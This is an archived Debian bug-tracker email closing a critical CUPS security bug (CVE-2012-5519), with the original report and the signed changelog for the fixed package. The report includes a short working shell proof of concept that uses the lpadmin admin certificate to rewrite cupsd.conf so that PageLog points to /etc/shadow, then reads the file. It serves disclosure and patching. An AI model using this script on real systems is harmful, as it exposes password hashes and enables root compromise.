Your message dated Sat, 12 Jan 2013 15:47:22 +0000
with message-id <[email protected]>
and subject line Bug#692791: fixed in cups 1.4.4-7+squeeze2
has caused the Debian Bug report #692791,
regarding members of lpadmin can read every file on server via cups
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
692791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole
Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible
to access the cups web interface as admin. You can edit the cups config file
and set the page log to any filename you want (for example /etc/shadow). Then
you can read the file contents by viewing the cups page log. By printing you
can also write some random data to the given file.
As it is not possible to use the cups authentication with a normal webbrowser I
created a simple shell script to show the effect. When called as any
unprivileged user which is member of lpadmin it should display the contents of
/etc/shadow:
#!/bin/sh
set -e
# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp
AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"
POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF
GET http://localhost:631/admin/log/page_log
This bug was detected by one of our customers, Jann Horn.
-- System Information:
Debian Release: 6.0.6
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages cups depends on:
ii adduser 3.112+nmu2 add and remove users and groups
ii bc 1.06.95-2 The GNU bc arbitrary precision cal
ii cups-client 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-common 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-ppdc 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii debconf [debconf-2. 1.5.36.1 Debian configuration management sy
ii ghostscript 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
ii libavahi-client3 0.6.27-2+squeeze1 Avahi client library
ii libavahi-common3 0.6.27-2+squeeze1 Avahi common library
ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib
ii libcups2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupscgi1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsdriver1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsimage2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsmime1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsppdc1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libdbus-1-3 1.2.24-4+squeeze1 simple interprocess messaging syst
ii libgcc1 1:4.4.5-8 GCC support library
ii libgnutls26 2.8.6-1+squeeze2 the GNU TLS library - runtime libr
ii libgssapi-krb5-2 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii libijs-0.35 0.35-7 IJS raster image transport protoco
ii libkrb5-3 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii libldap-2.4-2 2.4.23-7.2 OpenLDAP libraries
ii libpam0g 1.1.1-6.1+squeeze1 Pluggable Authentication Modules l
ii libpaper1 1.1.24 library for handling paper charact
ii libpoppler5 0.12.4-1.2 PDF rendering library
ii libslp1 1.2.1-7.8 OpenSLP libraries
ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3
ii libusb-0.1-4 2:0.1.12-16 userspace USB programming library
ii lsb-base 3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii poppler-utils 0.12.4-1.2 PDF utilitites (based on libpopple
ii procps 1:3.2.8-9squeeze1 /proc file system utilities
ii ssl-cert 1.0.28 simple debconf wrapper for OpenSSL
ii ttf-freefont 20090104-7 Freefont Serif, Sans and Mono True
ii zlib1g 1:1.2.3.4.dfsg-3 compression library - runtime
Versions of packages cups recommends:
ii cups-driver-gutenprint 5.2.6-1 printer drivers for CUPS
ii foomatic-filters 4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii ghostscript-cups 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
Versions of packages cups suggests:
ii cups-bsd 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
pn cups-pdf <none> (no description available)
ii foomatic-db 20100630-1 OpenPrinting printer support - dat
pn hplip <none> (no description available)
ii smbclient 2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for
ii udev 164-3 /dev/ and hotplug management daemo
pn xpdf-korean | xpdf-jap <none> (no description available)
-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]
-- debconf information excluded
--- End Message ---
--- Begin Message ---
Source: cups
Source-Version: 1.4.4-7+squeeze2
We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Didier Raboud <[email protected]> (supplier of updated cups package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sat, 29 Dec 2012 12:33:27 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsdriver1 libcupsmime1
libcupsppdc1 cups cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev
libcupsdriver1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common
cups-ppdc cups-dbg cupsddk
Architecture: source all amd64
Version: 1.4.4-7+squeeze2
Distribution: squeeze-security
Urgency: high
Maintainer: Debian CUPS Maintainers <[email protected]>
Changed-By: Didier Raboud <[email protected]>
Description:
cups - Common UNIX Printing System(tm) - server
cups-bsd - Common UNIX Printing System(tm) - BSD commands
cups-client - Common UNIX Printing System(tm) - client programs (SysV)
cups-common - Common UNIX Printing System(tm) - common files
cups-dbg - Common UNIX Printing System(tm) - debugging symbols
cups-ppdc - Common UNIX Printing System(tm) - PPD manipulation utilities
cupsddk - Common UNIX Printing System (transitional package)
libcups2 - Common UNIX Printing System(tm) - Core library
libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
libcupscgi1 - Common UNIX Printing System(tm) - CGI library
libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI
libra
libcupsdriver1 - Common UNIX Printing System(tm) - Driver library
libcupsdriver1-dev - Common UNIX Printing System(tm) - Development files
driver librar
libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS
image li
libcupsmime1 - Common UNIX Printing System(tm) - MIME library
libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME
library
libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD
library
Closes: 692791
Changes:
cups (1.4.4-7+squeeze2) stable-security; urgency=high
.
* Backport upstream configuration files split:
- Add split-configuration-files-STR4223.dpatch
- Install the new cups-files.conf
Fixes: CVE-2012-5519 (Closes: #692791)
* Make cupsd.conf a non-conffile, as it is managed by cups itself.
- On new installs, set it up from cupsd.conf.default.
- On upgrades, move it away in preinst and move it back in postinst.
- On aborted upgrades, move the file back in place.
- On purge, delete it too.
* Document changes in cups.NEWS.
Checksums-Sha1:
6b922165e26726832978ec4ae2eb406e1f35f3b9 2583 cups_1.4.4-7+squeeze2.dsc
c6afc5d96747e74b9755d2cce3401638700ced8f 521545 cups_1.4.4-7+squeeze2.diff.gz
544bc6b73ca305a50a18da18fe96e049e11f448f 1344298
cups-common_1.4.4-7+squeeze2_all.deb
39d3bc308725571a67343438b94cb64514686b6d 77024 cupsddk_1.4.4-7+squeeze2_all.deb
d04708b15eacd018ed5dcb50508c77890d05b446 234040
libcups2_1.4.4-7+squeeze2_amd64.deb
f35568b66006418c793498a786ccb82c79ccaf06 125394
libcupsimage2_1.4.4-7+squeeze2_amd64.deb
a0537d0648438ddbdbb134264dadb499a6ce1788 105338
libcupscgi1_1.4.4-7+squeeze2_amd64.deb
2cd2b644b8aadbb237da3701c873f77948d409b3 93916
libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
5cd392e71dbace2554fc3e21ba4825707be3fd62 87686
libcupsmime1_1.4.4-7+squeeze2_amd64.deb
51201857fc49b8de27a14e70a273861e2e4ccc92 132420
libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
ec37d72fdb6123c8b6186570b9390fbff49f5dc3 2059088
cups_1.4.4-7+squeeze2_amd64.deb
6e7e29037b800da958e09e57909d22c051881c26 139494
cups-client_1.4.4-7+squeeze2_amd64.deb
8dbd223ae56419ac14e8c7c685ee62375c261185 294934
libcups2-dev_1.4.4-7+squeeze2_amd64.deb
53072d6018f62e63c09cec272492881488a1c004 61186
libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
ab9eae265141d4533127d1f9ba164e697ca9ae6f 110938
libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
fbe450cb6d17611633c443671cffb0da8a90ba28 96886
libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
066e39be34daba32ce45597f6d2761768827b62a 88420
libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
575d2e20625d4fba7cf395c2ffc2413011ebc801 149904
libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
3a59df460e1baebf75ab144cfb98c9e576288601 46532
cups-bsd_1.4.4-7+squeeze2_amd64.deb
93b7ba14959112306d843230a644e656c91678bd 106586
cups-ppdc_1.4.4-7+squeeze2_amd64.deb
e996d7ff3d2ed820208b7f5491a97a2447c536b4 97122
cups-dbg_1.4.4-7+squeeze2_amd64.deb
Checksums-Sha256:
bd4021ac5f0c673277ed769c11630b7fa8563c4f411b5b80a354f0fc56aea30b 2583
cups_1.4.4-7+squeeze2.dsc
4dd13c53dc7793221f5fb2ca57f0637de43d99a277e1e5a753362d4be3b00517 521545
cups_1.4.4-7+squeeze2.diff.gz
9dd540769a216eb644848671e5f59438edf8d560db77db86f0866a8e5ff8616e 1344298
cups-common_1.4.4-7+squeeze2_all.deb
ba706ae5fff98ba8dbc88f88b87598fc8e77e7175f44b0b52aab4a45d0c36da5 77024
cupsddk_1.4.4-7+squeeze2_all.deb
6852a1c2460602bb57ccba8d808bd91f1fae038a9228cddb2ad1d7e823b64234 234040
libcups2_1.4.4-7+squeeze2_amd64.deb
b95fbd4cf16b5451610e52696d3f4da9ce1d1707e021eb2a9663ce560df63ea4 125394
libcupsimage2_1.4.4-7+squeeze2_amd64.deb
e246eb0d184cb9e409394d1bbccd53f55018ba646b986a138f749849e187580a 105338
libcupscgi1_1.4.4-7+squeeze2_amd64.deb
61bb064df5977a03519c6f357481581f75beab42dcdfddf362c4ef3255fcdcb0 93916
libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
ab3b73adcb85fea8d955acbb62e7c718d33e777ff76d10527698e5a349e12fc3 87686
libcupsmime1_1.4.4-7+squeeze2_amd64.deb
9e91ab36c25fdc89e46ce27bec9793b4c2e86102260301ed8f8b7cc4c46f6841 132420
libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
378a499c0358b880ca165e420b49976ceea8a20e11c86e7bdbd40cc8b03648e4 2059088
cups_1.4.4-7+squeeze2_amd64.deb
7ae10eb6984a084048983216475f1b1fd91104171d332526165d750081ab14bd 139494
cups-client_1.4.4-7+squeeze2_amd64.deb
13a3487740ca366d06d2ddc7f6608646b96b74b2d7f3e19c759eae678ee5077e 294934
libcups2-dev_1.4.4-7+squeeze2_amd64.deb
2d892b4d8ef6b2f50fe8decf981088695ba770f1db88bdf9d9487aa62c07106c 61186
libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
a2bfa856774f046ff31c41889f7b47f7efd46fb75f101df21dfd7598c0e60b26 110938
libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
1b48cbe741863161551eca74cdc73e2b4705f5a67a2d14c5ce9a915257d8d174 96886
libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
c5549b011a5e7b7d1e94761b9f3caee366cc183ece80d23f9ff97cec3c54a807 88420
libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
d33a6d26d1697c0485298a2c20ec6c33f1b25017c743e446e2305a3fd3cf4bd5 149904
libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
8e9d635f603f0c5757ccd65cf4ff2fad6ea6ceadcecc32fc8ada048560c3b43a 46532
cups-bsd_1.4.4-7+squeeze2_amd64.deb
120ee31ed37383e73f6b570986a54995da197812daff044734293b0fd27f2d49 106586
cups-ppdc_1.4.4-7+squeeze2_amd64.deb
0f00eb3ddb41ae9c3aa01704d0ec09f892404139e85e0e48abe0535572ce76d6 97122
cups-dbg_1.4.4-7+squeeze2_amd64.deb
Files:
81b09faac4dfeb46339f1ad31a8847d0 2583 net optional cups_1.4.4-7+squeeze2.dsc
2a2894ea965d229e89a2b4e5d34bbcf1 521545 net optional
cups_1.4.4-7+squeeze2.diff.gz
598ebbd39e6267e7f9e3e5859882bf25 1344298 net optional
cups-common_1.4.4-7+squeeze2_all.deb
feb2e8342bfdb4314ccce1b7ee8d7c17 77024 oldlibs extra
cupsddk_1.4.4-7+squeeze2_all.deb
83e4398558baf341f309ffd7dc8b804f 234040 libs optional
libcups2_1.4.4-7+squeeze2_amd64.deb
0aa9a4b39e8e37175260190dbb6abd4f 125394 libs optional
libcupsimage2_1.4.4-7+squeeze2_amd64.deb
3fc0c95452a701519dfb0cfe452e8e57 105338 libs optional
libcupscgi1_1.4.4-7+squeeze2_amd64.deb
a27420bb5c58f54d0dbb377bb5d03cd2 93916 libs optional
libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
f19f88df88bb245ac80559977e51123a 87686 libs optional
libcupsmime1_1.4.4-7+squeeze2_amd64.deb
e8071d13d22a496077b5e8eb04241184 132420 libs optional
libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
ca37d3ff9ba77b72d6f3ed8ca9a8b5c9 2059088 net optional
cups_1.4.4-7+squeeze2_amd64.deb
541219e6b0a7a47493a9a1add3e15625 139494 net optional
cups-client_1.4.4-7+squeeze2_amd64.deb
6ec993d5884c92c0cd5e3781dcc47000 294934 libdevel optional
libcups2-dev_1.4.4-7+squeeze2_amd64.deb
e3a6bfc0c57718804b09c6f91f7e7dcf 61186 libdevel optional
libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
48fff9a16a074a498d7059e529dd264d 110938 libdevel optional
libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
f28e008377d699a4616ed5b661c6cbac 96886 libdevel optional
libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
4c0cbf5e55946aedb22089e9a8d23886 88420 libdevel optional
libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
4d657fbf340928e5f4d6c5cb4ab35bba 149904 libdevel optional
libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
6208ace17e754fbd33ed89215a3b6da7 46532 net extra
cups-bsd_1.4.4-7+squeeze2_amd64.deb
2a4bd6619eb7bccfaa9975e2004dc3d5 106586 net optional
cups-ppdc_1.4.4-7+squeeze2_amd64.deb
0637a0175f63391a7f88945733438d0e 97122 debug extra
cups-dbg_1.4.4-7+squeeze2_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iQGcBAEBCAAGBQJQ3vQ4AAoJEIvPpx7KFjRVk3EL/jFgtEvLtIttC0UsIfIoHl2L
munL8/yeawVk5tbYmKgQRAXpzPe46+9AxGB9hNDxc6Z/i4D7g0AHLRUPgpJv1S2p
39ijm85ar6NZ5In5149WxVbdxo4T1a4d5HI4mRnrOv3R9NLS/3YWRw/QDsOvCP90
smKYyhR7xhdek4g2nyrpXE/51+R0hyRyUXa6qNVNevAuSOh1AVVEgZcBOKthHFme
ZP8qYaEKCpNXfIdcgPcv6hFgrAYZnonHtQlrUsn71O6NbTzBIrPjtZBDPkJ3Pf9a
72JGHwGH+L0464uCrjHQp22M3AfTbv0yqPDlV5XyTYYf5g232VmM74naIu9syXSl
S+YjSPe5m74r2XWU+cOVY0gwNi4TkAiGARZy/GxtCBoJLp9SBxJTV7rx4CQsdR1m
BIXabrBsWo7WdRWB+w4xJSq0jQ0KUA89Z/WsfwcNZI2Ys+aw9DiClz0AZCzv36G0
8BAah9gVn00Ez+jiy4GmMSUwoOihdvfhxKhCUNNDXg==
=JxfV
-----END PGP SIGNATURE-----
--- End Message ---
